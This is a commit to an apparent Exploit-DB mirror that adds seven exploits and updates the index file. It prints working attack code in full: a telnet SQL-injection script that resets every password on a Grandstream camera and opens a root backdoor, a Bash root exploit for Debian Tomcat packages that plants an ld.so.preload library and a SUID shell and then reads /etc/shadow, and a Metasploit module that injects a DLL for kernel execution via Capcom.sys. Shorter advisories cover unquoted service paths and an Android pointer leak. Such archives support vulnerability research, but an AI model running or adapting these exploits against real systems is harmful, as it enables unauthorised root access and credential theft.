bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-04

Browse source 
7 new exploits

maplab ms4w 2.2.1 - Remote File Inclusion
MapLab MS4W 2.2.1 - Remote File Inclusion

Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow

Grandsteam GXV3611_HD - SQL Injection

Glassfish Server - Unquoted Service Path Privilege Escalation
Windows Firewall Control - Unquoted Service Path Privilege Escalation
Android - Insufficient Binder Message Verification Pointer Leak
DWebPro 8.4.2 - Multiple Vulnerabilities
Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation
Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)
This commit is contained in:
Offensive Security 2016-10-04 05:01:17 +00:00
parent 2963ce32a0
commit d9bdc2e376
8 changed files with 785 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -3302,7 +3302,7 @@ id,file,description,date,author,platform,type,port
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0
3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote Exploit (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote,0
3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0
3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0
3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0
@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port
3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0
3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0
3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0
3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0
3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0
3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
@ -36220,6 +36220,7 @@ id,file,description,date,author,platform,type,port
39922,platforms/osx/dos/39922.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0
39923,platforms/osx/dos/39923.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0
39924,platforms/osx/dos/39924.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0
40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0
39925,platforms/osx/dos/39925.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0
39926,platforms/osx/dos/39926.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0
39927,platforms/osx/dos/39927.c,"Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0
@ -36561,5 +36562,11 @@ id,file,description,date,author,platform,type,port
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0

Can't render this file because it is too large.

40
platforms/android/dos/40449.txt Executable file
View file

@ -0,0 +1,40 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860
When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time.
One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip().
A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk).
Its logcat output looks like this:
===============
[...]
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
type: BINDER_TYPE_BINDER
object: 0x000000712967e260
== service "package" ==
type: BINDER_TYPE_BINDER
object: 0x000000712963cfc0
== service "clipboard" ==
type: BINDER_TYPE_BINDER
object: 0x00000071367bfd80
===============
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip

45
platforms/hardware/remote/40441.py Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: Grandstream GXV3611_HD Telnet SQL Injection and backdoor command
# Exploit Author: pizza1337
# Vendor Homepage: http://www.grandstream.com/
# Version: GXV3611_HD Core 1.0.3.6, 1.0.4.3
# GXV3611IR_HD Core 1.0.3.5
# Tested on:
# -GXV3611_HD
# Bootloader Version: 1.0.0.0
# Core Version: 1.0.4.3
# Base Version: 1.0.4.43
# Firmware Version: 1.0.4.43
# -GXV3611IR_HD
# Bootloader Version: 1.0.3.5
# Core Version: 1.0.3.5
# Base Version: 1.0.3.5
# Firmware Version: 1.0.3.5
# CVE : CVE-2015-2866
# Category: remote
# More information:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2866
# https://www.kb.cert.org/vuls/id/253708
# Description:
# http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html
import telnetlib
import sys
if len(sys.argv) < 2:
print "USAGE: python %s IP_ADDRESS"%sys.argv[0]
quit()
conn = telnetlib.Telnet(sys.argv[1])
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") #This changes all the passwords to a, including the admin password
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") #Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup. For some reason, typing "!#/ port" does not seem to work.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print "Telnet into port 20000 with username root and no password to get shell" #There is no login password

456
platforms/linux/local/40450.txt Executable file
View file

@ -0,0 +1,456 @@
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-1240
- Release date: 30.09.2016
- Revision: 1
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation
Affected debian packages:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
Ubuntu systems are also affected. See section VII. for details.
Other systems using the affected debian packages may also be affected.
II. BACKGROUND
-------------------------
"The Apache Tomcat® software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.
The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.
Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"
http://tomcat.apache.org/
III. INTRODUCTION
-------------------------
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.
IV. DESCRIPTION
-------------------------
The vulnerability is located in the tomcat init script provided by affected
packages, normally installed at /etc/init.d/tomcatN.
The script for tomcat7 contains the following lines:
-----[tomcat7]----
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
-------[eof]------
Local attackers who have gained access to the server in the context of the
tomcat user (for example, through a vulnerability in a web application) would
be able to replace the log file with a symlink to an arbitrary system file
and escalate their privileges to root once Tomcat init script (running as root)
re-opens the catalina.out file after a service restart, reboot etc.
As attackers would already have a tomcat account at the time of exploitation,
they could also kill the tomcat processes to introduce the need for a restart.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
------[ tomcat-rootprivesc-deb.sh ]------
#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TOMCATLOG
touch $TOMCATLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload 2>/dev/null
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
exit 3
fi
if [ "$2" = "-deferred" ]; then
mode="deferred"
else
mode="active"
fi
# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
exit 3
fi
# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"
# [ Deferred exploitation ]
# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"
echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n"
exit 0
fi
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
cleanexit 2
fi
# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)"
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
break;
fi
done
# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0
--------------[ EOF ]--------------------
Example exploit run:
~~~~~~~~~~~~~~
tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
[+] Compiling the privesc shared library (/tmp/privesclib.c)
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
Please tell me you're seeing this too ;)
[+] Executing the rootshell /tmp/tomcatrootsh now!
tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit
[+] Cleaning up...
[+] Job done. Exiting with code 0
VI. BUSINESS IMPACT
-------------------------
Local attackers who have gained access to tomcat user account (for example
remotely via a vulnerable web application, or locally via weak webroot perms),
could escalate their privileges to root and fully compromise the affected system.
VII. SYSTEMS AFFECTED
-------------------------
The following Debian package versions are affected:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
A more detailed lists of affected packages can be found at:
Debian:
https://security-tracker.debian.org/tracker/CVE-2016-1240
Ubuntu:
http://www.ubuntu.com/usn/usn-3081-1/
Other systmes that use Tomcat packages provided by Debian may also be affected.
VIII. SOLUTION
-------------------------
Debian Security Team was contacted and has fixed affected upstream packages.
Update to the latest tomcat packages provided by your distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
The exploit's sourcecode
http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
CVE-2016-1240
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240
Ubuntu Security Notice USN-3081-1:
http://www.ubuntu.com/usn/usn-3081-1/
Debian Security Advisory DSA-3669-1 (tomcat7):
https://lists.debian.org/debian-security-announce/2016/msg00249.html
https://www.debian.org/security/2016/dsa-3669
Debian Security Advisory DSA-3670-1 (tomcat8):
https://www.debian.org/security/2016/dsa-3670
https://security-tracker.debian.org/tracker/CVE-2016-1240
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
30.09.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

119
platforms/win_x86-64/local/40451.rb Executable file
View file

@ -0,0 +1,119 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
'Description' => %q{
This module abuses the Capcom.sys kernel driver's function that allows for an
arbitrary function to be executed in the kernel from user land. This function
purposely disables SMEP prior to invoking a function given by the caller.
This has been tested on Windows 7 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'TheWack0lian', # Issue discovery
'OJ Reeves' # exploit and msf module
],
'Arch' => [ ARCH_X86_64],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows x64 (<= 8)', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
],
'DisclosureDate' => 'Jan 01 1999', # non-vuln exploit date
'DefaultTarget' => 0
}))
end
def check
if sysinfo['OS'] !~ /windows 7/i
return Exploit::CheckCode::Unknown
end
if sysinfo['Architecture'] =~ /(wow|x)64/i
arch = ARCH_X86_64
else
return Exploit::CheckCode::Safe
end
file_path = expand_path('%windir%') << '\\system32\\capcom.sys'
return Exploit::CheckCode::Safe unless file_exist?(file_path)
# TODO: check for the capcom.sys driver and its version.
return Exploit::CheckCode::Appears
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
check_result = check
if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if sysinfo['Architecture'] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec',
'capcom_sys_exec.x64.dll')
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end

36
platforms/windows/local/40438.txt Executable file
View file

@ -0,0 +1,36 @@
# Title: Glassfish Server - Unquoted Service Path Privilege Escalation
# Date: 28/09/2016
# Author: s0nk3y
# Software link: https://glassfish.java.net/download.html
# Tested: Windows Server 2008 r2 (Metasploitable3)
1. Description
Glassfish Server a service with an unquoted service path running with
SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\vagrant>sc qc domain1
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: domain1
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\glassfish\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : domain1 GlassFish Server
DEPENDENCIES : tcpip
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

27
platforms/windows/local/40443.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Windows Firewall Control Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://www.binisoft.org
# Version: 4.8.6.0
# Tested on: Windows 7 32/64bit
====Description====
Windows Firewall Control lacks of the quotes in filepath, causing it to be a potential vector of privilege escalation attack.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
====Proof-of-Concept====
C:\\Users\\testusr>sc qc _wfcs
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: _wfcs
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Program Files\\Windows Firewall Control\\wfcs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Windows Firewall Control
DEPENDENCIES : MpsSvc
SERVICE_START_NAME : LocalSystem

53
platforms/windows/remote/40445.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: DWebPro 8.4.2 Remote Binary Execution
# Date: 01/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://www.dwebpro.com/
# Software Link: http://www.dwebpro.com/download
# Version: 8.4.2
